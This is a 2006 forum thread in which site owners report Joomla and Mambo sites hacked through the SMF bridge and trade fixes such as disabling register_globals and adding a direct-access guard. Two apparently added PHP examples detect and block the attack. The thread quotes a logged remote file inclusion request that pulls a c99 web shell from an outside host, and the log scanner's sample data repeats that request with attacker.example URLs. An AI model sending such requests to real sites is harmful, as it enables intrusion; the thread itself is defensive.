Security issue - eno7 hacker

Started by anna.young, July 17, 2006, 10:42:06 AM


anna.young

Our Joomla website has just been hacked through the SMF component by the Turkish eno7 hacker:

85.108.125.96 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://www.xxxxxxxxxxxxx.com/images/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; tr-TR; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
......

What are the practical steps to restore the website?

And then what are the practical steps to prevent it from recurring?

Thank you

Anna
Toronto German Shepherd Dog Rescue

"Here's to the crazy ones, the misfits, the rebels, the troublemakers, the round pegs in the square holes... the ones who see things differently -- they're not fond of rules... You can quote them, disagree with them, glorify or vilify them, but the only thing you can't do is ignore them because they change things... they push the human race forward, and while some may see them as the crazy ones, we see genius, because the ones who are crazy enough to think that they can change the world, are the ones who do." (SJ)
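One way to find requests like the one quoted above in an access log, as an added PHP example that is not from this thread (the log lines are constructed, and the IP addresses and the host name are placeholders):

```php
<?php
// Added example (not from the thread): scan Apache combined-format access-log
// lines for requests that pass a URL in a query parameter, the pattern of the
// remote file inclusion attempt quoted in the first post.

// Constructed sample lines; the IPs, host and file names are placeholders.
const SAMPLE_LOG = <<<'LOG'
198.51.100.7 - - [17/Jul/2006:08:54:53 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://attacker.example/c99.txt?ls HTTP/1.1" 200 3879 "-" "Mozilla/5.0"
198.51.100.8 - - [17/Jul/2006:09:01:10 -0400] "GET /index.php?option=com_smf&Itemid=26 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
198.51.100.9 - - [17/Jul/2006:09:02:44 -0400] "GET /components/com_smf/smf.php?mosConfig_absolute_path=%68ttp://attacker.example/x.txt HTTP/1.1" 200 3879 "-" "Mozilla/5.0"
LOG;

/**
 * Return one finding per suspicious request: client IP, the parameter name
 * and the URL it carried. Values are URL-decoded first so a percent-encoded
 * scheme ("%68ttp") is caught as well as a plain one.
 */
function findRemoteIncludeRequests(string $log): array
{
    $findings = [];
    $pattern = '/^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"/';
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match($pattern, $line, $m)) {
            continue;
        }
        [, $ip, $target] = $m;
        $query = parse_url($target, PHP_URL_QUERY);
        if ($query === null || $query === false) {
            continue;
        }
        // Split by hand rather than with parse_str(), so the "?ls" that the
        // attacker appended to the injected URL stays part of the value.
        foreach (explode('&', $query) as $pair) {
            [$name, $value] = array_pad(explode('=', $pair, 2), 2, '');
            $value = rawurldecode($value);
            if (preg_match('#^(?:https?|ftp)://#i', $value)) {
                $findings[] = ['ip' => $ip, 'param' => rawurldecode($name), 'url' => $value];
            }
        }
    }
    return $findings;
}

foreach (findRemoteIncludeRequests(SAMPLE_LOG) as $f) {
    printf("%s passed %s in parameter %s\n", $f['ip'], $f['url'], $f['param']);
}
```

On the sample above the first and third lines are reported and the ordinary com_smf request is not; the same function can be fed a real log file read with file_get_contents().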

Miraenda

Hi Anna,

The same IP attacked and hacked my Mambo site with the SMF bridge.  I've taken my site down until I also get more details on resolving this.  I've also contacted 1&1, who hosts allianceforvirtualbiz.com, to request the site be suspended, as they are enabling the hacker to function by providing the file.

My webhost is going to block both 85.108.125.96 and 82.165.193.254 at the network level switch before it even hits the servers to ensure this isn't able to reach our network again.

I hope someone from SMF can help.

Thanks.

Miraenda

I found out more details that would pertain to Mambo/Joomla for this hack attempt:

http://forum.mamboserver.com/showthread.php?p=378826

Did you have register_globals set to On or is it set to on for your server?  If so, put a php.ini file on your account and set it to Off.  I thought I had mine set to off, but I guess there were 2 php.ini files on my server and it was going off the other one :(

Additionally, I'd follow reply #6 and put that code noted in that post into the file for your smf component.  Once I re-install mine from backup tonight, I'll give details on what file it would be (I imagine smf.php though as that's the file that was hit in the component).

anna.young

Thank you Miraenda

My configuration.php is gone, empty... I'm trying to locate one in my back up files & I'm not sure which one is the correct one.

Anna
Toronto German Shepherd Dog Rescue


Tony Reid

I've been hit by this also and had to remove the integration of SMF RC1.2 from my Joomla site.

My logs were rotated before I could get to how they uploaded it - but I found a url very similar to the above one in my webalizer :)

Were you running Joomla 1.0.8? That has known vulnerabilities - I'm thinking that was the reason.
Tony Reid

Miraenda

Hi Tony,

The issue is having register_globals set to ON.  If you do, you need to change it to off right now.

Next, you need to input in smf.php at components/com_smf the following code:

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

Both of these will prevent this from happening again.  It isn't the version that's the issue, it's that the component bridge is allowing the /components/com_smf/smf.php?mosConfig_absolute_path=http://someurl/somebadfile.txt to be passed.  Any component you have that allows that is going to leave you open to attack.

I posted about it at this url on my site that's now back:

http://ratingbar.com/component/option,com_smf/Itemid,26/topic,100.0/

Thanks.
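How the guard line above stops the attack, shown in an added PHP example that is not the bridge's own code: Joomla's index.php defines _VALID_MOS before it includes a component file, so a request that hits components/com_smf/smf.php directly never has it defined and dies before any include that uses $mosConfig_absolute_path runs. The two helper functions (insecureIniSettings and safeComponentPath) are additions of this example, not part of the bridge.

```php
<?php
// Added example: hardened front section for a Joomla/Mambo component file such
// as components/com_smf/smf.php. Not the bridge's own code.

// The line from the thread. Joomla's index.php defines _VALID_MOS before
// including a component; a direct request to this file skips that and stops
// here, before $mosConfig_absolute_path is used by any include().
defined('_VALID_MOS') or die('Direct Access to this location is not allowed.');

// Defence in depth (added here, not in the bridge): report the two php.ini
// settings the thread names. register_globals lets a query parameter
// overwrite $mosConfig_absolute_path; allow_url_fopen lets include() load
// that value from a remote URL. Both are expected to be Off.
function insecureIniSettings(): array
{
    $bad = [];
    foreach (['register_globals', 'allow_url_fopen'] as $name) {
        // ini_get() returns false for a directive this PHP no longer has,
        // which filter_var() treats as Off.
        if (filter_var(ini_get($name), FILTER_VALIDATE_BOOLEAN)) {
            $bad[] = $name;
        }
    }
    return $bad;
}

// Only include files that resolve inside the path the application itself
// established; a URL or a path outside the site root is rejected.
function safeComponentPath(string $absolutePath, string $relative): string
{
    $base   = realpath($absolutePath);
    $target = realpath($absolutePath . '/' . $relative);
    if ($base === false || $target === false
        || strpos($target, $base . DIRECTORY_SEPARATOR) !== 0) {
        die('Invalid component path.');
    }
    return $target;
}

if ($settings = insecureIniSettings()) {
    die('Refusing to run with ' . implode(', ', $settings) . ' enabled.');
}

// Assumed usage: the bridge would then include its own files like this,
// never from a value that came in with the request.
// require_once safeComponentPath($mosConfig_absolute_path, 'components/com_smf/smf_api.php');
```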

Orstio

Actually, part of the problem is also having allow_url_fopen set to On.

This has been secured in bridge 1.1.5a.  I suggest upgrading:

http://www.simplemachines.org/community/index.php?topic=97649.0

Miraenda

There were 3 attempts to hack me after I made the 2 changes (register_globals to off and the code inserted into the smf.php file), and they haven't been able to get through.  Does the new bridge have this code in smf.php now or not?

defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.');

If it does not, can this please be added to the newest bridge?

anna.young

Thank you Orstio, the above bridge is for SMF 1.1 RC2 only, I have RC1.  What should I do in my case? Is bridge 3.19a equally secure?

Thanks,

Anna

Toronto German Shepherd Dog Rescue


Orstio

No, in 3.19a, you will need to add the line of code Miraenda posted above.

anna.young

I just went through all the files contained in Bridge 3.19a and I'm not able to locate smf.php, which according to the instructions is supposed to go into components/com_smf.

Quote:
These go in components/com_smf/:

smf.php

I'm obviously not looking into the right folders.  Which folder is that file in?

Thank you Orstio

Anna
Toronto German Shepherd Dog Rescue


Orstio

In 3.19a it will be in your Step 2 folder, inside the com_smf.zip.

anna.young

You are the most patient person, Orstio, that I've met in years...  ;)  Ever?

Thank you!!! Found it, added the 'security' lines, put it in and it works!!!  8)

What a day it has been!

Anna
Toronto German Shepherd Dog Rescue


anna.young

I'm happy to report that there have been numerous hacking attempts since yesterday (same as Miraenda) and they were all unsuccessful.  ;D

Thank you again 

Anna
Toronto German Shepherd Dog Rescue

